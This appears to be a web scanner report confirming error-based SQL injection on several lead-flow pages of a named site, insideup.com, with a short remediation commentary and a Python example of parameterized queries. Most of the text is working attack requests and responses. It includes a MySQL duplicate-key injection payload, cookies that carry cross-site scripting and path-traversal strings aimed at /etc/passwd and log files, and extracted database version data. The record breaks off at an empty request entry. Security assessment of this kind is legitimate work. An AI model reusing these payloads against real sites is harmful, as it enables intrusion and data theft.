GET /ppc/leadflow/meac00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3522e2gn69248r9u9l46vra1i5; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
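Two caveats on the phsy00 and meac00 requests above before the fix. First, the long `Cookie:` header is not part of this finding: the `OAVARS[...]` keys carry leftover payloads from the scanner's earlier cross-site scripting and file-inclusion tests (`netsparker(0x...)`, `NSFTW`, `../../etc/passwd`) that its cookie jar kept sending, and the SQL error is triggered by `catId` alone. Second, the echoed statement shows the root cause plainly: the request URI is pasted into a quoted SQL literal, and the error text is printed into the page. The application's PHP is not on the page, so the Python below reconstructs that pattern as an assumption, using an in-memory SQLite table whose column names are taken from the echoed query, and puts the string-built lookup beside a parameterized one. It is an added example, not the site's code; the rows, the `make_db`/`lookup_*`/`row_counts`/`vulnerable_error` names and the tautology input are all constructed here. The MySQL-specific parts of the scanner's payload (`row()`, `rand()`, the GROUP BY duplicate-key error) do not exist in SQLite, so the example shows the same boundary failure with a quote and a tautology instead.

```python
import sqlite3

# Constructed schema and rows; only the column names come from the echoed query.
ROWS = [
    (20001, 1, 1, "leadflow/lgds00/project.php?catId=20001&iusrc=iupsc"),
    (20002, 1, 2, "leadflow/phsy00/project.php?catId=20002&iusrc=iupsc"),
]
COLUMNS = "catId, groupId, templateId, project_page_url"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute(
        "create table lead_flow_one_pages_details "
        "(catId int, groupId int, templateId int, project_page_url text)"
    )
    db.executemany("insert into lead_flow_one_pages_details values (?,?,?,?)", ROWS)
    return db


def lookup_vulnerable(db: sqlite3.Connection, request_uri: str) -> list:
    # Same shape as the statement the site echoes: the request URI lands inside
    # the quotes, so a quote in the URI rewrites the WHERE clause.
    sql = (
        "select " + COLUMNS + " from lead_flow_one_pages_details prj "
        "where prj.project_page_url = '" + request_uri + "'"
    )
    return db.execute(sql).fetchall()


def lookup_safe(db: sqlite3.Connection, request_uri: str) -> list:
    # The URI travels as a bound parameter; the SQL text never changes.
    sql = (
        "select " + COLUMNS + " from lead_flow_one_pages_details prj "
        "where prj.project_page_url = ?"
    )
    return db.execute(sql, (request_uri,)).fetchall()


def row_counts(request_uri: str) -> tuple:
    """(rows from the string-built query, rows from the parameterized query)."""
    db = make_db()
    return len(lookup_vulnerable(db, request_uri)), len(lookup_safe(db, request_uri))


def vulnerable_error(request_uri: str):
    """The database error the string-built lookup raises for this URI, or None.
    Printing this string into the page is the disclosure seen in the report."""
    try:
        lookup_vulnerable(make_db(), request_uri)
    except sqlite3.Error as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    normal = "leadflow/lgds00/project.php?catId=20001&iusrc=iupsc"
    tautology = "leadflow/lgds00/project.php?catId=20001&iusrc=' OR '1'='1"
    print(row_counts(normal), row_counts(tautology))
    print(vulnerable_error("leadflow/lgds00/project.php?catId='"))
```

The parameterized lookup returns nothing for the tautology because the whole URI is compared as one value; the string-built one returns every row. Binding the value is the fix; hiding the error text (display_errors off, a generic error page) only removes the oracle, not the injection.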
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/inco00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5t438bp1gms1s6nmbhomprbig0; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

